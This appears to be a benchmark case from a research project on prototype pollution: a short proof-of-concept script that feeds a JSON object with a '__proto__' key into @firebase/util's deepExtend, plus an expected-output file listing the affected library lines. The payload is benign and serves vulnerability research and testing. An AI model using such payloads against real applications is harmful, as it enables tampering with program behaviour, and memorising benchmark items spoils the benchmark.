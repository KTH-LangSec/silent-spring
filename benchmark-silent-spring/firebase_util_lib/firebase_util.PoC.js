//https://hackerone.com/reports/1001218
  const utils = require("@firebase/util");
  const source = JSON.parse('{"__proto__":{"polluted":"yes"}}');
  utils.deepExtend({}, source);
