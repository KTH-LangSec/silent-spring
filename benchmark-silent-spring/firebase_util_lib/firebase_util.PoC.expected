node_modules/@firebase/util/dist/index.node.cjs.js:437:9
node_modules/@firebase/util/dist/index.cjs.js:437:9
node_modules/@firebase/util/dist/index.esm.js:433:9
node_modules/@firebase/util/dist/index.esm2017.js:431:9
